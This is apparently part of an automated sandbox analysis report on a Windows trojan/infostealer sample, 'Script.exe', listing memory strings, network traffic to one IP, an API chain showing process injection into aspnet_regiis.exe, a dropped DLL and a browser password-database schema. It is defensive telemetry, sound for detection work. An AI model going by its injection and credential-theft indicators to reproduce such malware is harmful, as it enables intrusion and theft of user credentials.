              Source: aspnet_regiis.exe, 00000003.00000003.2189114617.00000000051BE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: aspnet_regiis.exe, 00000003.00000003.2143432103.000000000517C000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143490026.0000000005179000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143560237.0000000005179000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
              Source: aspnet_regiis.exe, 00000003.00000003.2188716616.000000000546E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49704 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49706 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49714 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49717 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.33.116:443 -> 192.168.2.5:49732 version: TLS 1.2

              System Summary

              barindex
              Source: Script.exeStatic PE information: section name: )UHMIO
              Source: Script.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B8F60 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,NtGetContextThread,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,CreateProcessW,NtGetContextThread,NtCreateThreadEx,CloseHandle,CloseHandle,NtGetContextThread,0_2_6E0B8F60
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B7510 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,GetModuleHandleW,0_2_6E0B7510
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009A2E890_2_009A2E89
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009E1A800_2_009E1A80
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009E24800_2_009E2480
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009E26B00_2_009E26B0
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009EF2B00_2_009EF2B0
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009FB4B00_2_009FB4B0
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009F60E00_2_009F60E0
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009C82400_2_009C8240
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009CB6600_2_009CB660
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009FDE600_2_009FDE60
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009CB3800_2_009CB380
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009F63100_2_009F6310
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009CBB000_2_009CBB00
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009E21200_2_009E2120
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009FE3200_2_009FE320
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B8F600_2_6E0B8F60
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B75100_2_6E0B7510
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B19700_2_6E0B1970
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B10000_2_6E0B1000
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0CA8410_2_6E0CA841
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0C08500_2_6E0C0850
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B89300_2_6E0B8930
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_6E0B51E00_2_6E0B51E0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02E498ED3_3_02E498ED
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02E47C6B3_3_02E47C6B
              Source: C:\Users\user\Desktop\Script.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224
              Source: Script.exe, 00000000.00000002.2391650388.0000000000F7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Script.exe
              Source: Script.exe, 00000000.00000000.2086868585.00000000009A2000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNathanEleanorBenjamin.hDwYT vs Script.exe
              Source: Script.exeBinary or memory string: OriginalFilenameNathanEleanorBenjamin.hDwYT vs Script.exe
              Source: Script.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Script.exeStatic PE information: Section: )UHMIO ZLIB complexity 1.0003217725863596
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/7@1/2
              Source: C:\Users\user\Desktop\Script.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7120
              Source: C:\Users\user\Desktop\Script.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_03
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\6e45d657-eb9a-43a6-bd66-699a2f1a234cJump to behavior
              Source: Script.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
              Source: C:\Users\user\Desktop\Script.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: aspnet_regiis.exe, 00000003.00000003.2143843908.000000000514A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2143697152.0000000005167000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Script.exeVirustotal: Detection: 29%
              Source: Script.exeString found in binary or memory: -addpset
              Source: Script.exeString found in binary or memory: -addfulltrust
              Source: Script.exeString found in binary or memory: -addgroup
              Source: Script.exeString found in binary or memory: -help
              Source: C:\Users\user\Desktop\Script.exeFile read: C:\Users\user\Desktop\Script.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\Script.exe "C:\Users\user\Desktop\Script.exe"
              Source: C:\Users\user\Desktop\Script.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\Script.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
              Source: C:\Users\user\Desktop\Script.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 1224
              Source: C:\Users\user\Desktop\Script.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\Script.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: C:\Users\user\Desktop\Script.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Script.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: Script.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb source: WERA0F2.tmp.dmp.6.dr
              Source: Binary string: mscorlib.ni.pdb source: WERA0F2.tmp.dmp.6.dr
              Source: Binary string: n0C:\Windows\mscorlib.pdb source: Script.exe, 00000000.00000002.2391418600.0000000000BEA000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.0000000000FDD000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WERA0F2.tmp.dmp.6.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbt source: Script.exe, 00000000.00000002.2391650388.000000000100D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Desktop\Script.PDB source: Script.exe, 00000000.00000002.2391418600.0000000000BEA000.00000004.00000010.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\Script.exeUnpacked PE file: 0.2.Script.exe.9a0000.0.unpack )UHMIO:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
              Source: Script.exeStatic PE information: section name: )UHMIO
              Source: Script.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009FE260 push eax; mov dword ptr [esp], 282B2A25h0_2_009FE26F
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009A27BD push ecx; ret 0_2_009A27BE
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009A3F06 push esi; retf 0_2_009A3F1F
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009A212D push esi; iretd 0_2_009A2130
              Source: C:\Users\user\Desktop\Script.exeCode function: 0_2_009A6F78 pushad ; iretd 0_2_009A6F82
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAC2E3 pushad ; ret 3_3_02EAC309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAC2E3 pushad ; ret 3_3_02EAC309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAC2E3 pushad ; ret 3_3_02EAC309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EACF89 pushfd ; retf 3_3_02EACF8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EACF89 pushfd ; retf 3_3_02EACF8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EACF89 pushfd ; retf 3_3_02EACF8A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAC2E3 pushad ; ret 3_3_02EAC309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAC2E3 pushad ; ret 3_3_02EAC309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAC2E3 pushad ; ret 3_3_02EAC309
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EAD252 push eax; iretd 3_3_02EAD269
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EADECC push 00000055h; ret 3_3_02EADED0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_3_02EACF89 pushfd ; retf 3_3_02EACF8A
              Source: Script.exeStatic PE information: section name: )UHMIO entropy: 7.999726379594664
              Source: C:\Users\user\Desktop\Script.exeFile created: C:\Users\user\AppData\Roaming\gdi32.dllJump to dropped file
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Script.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
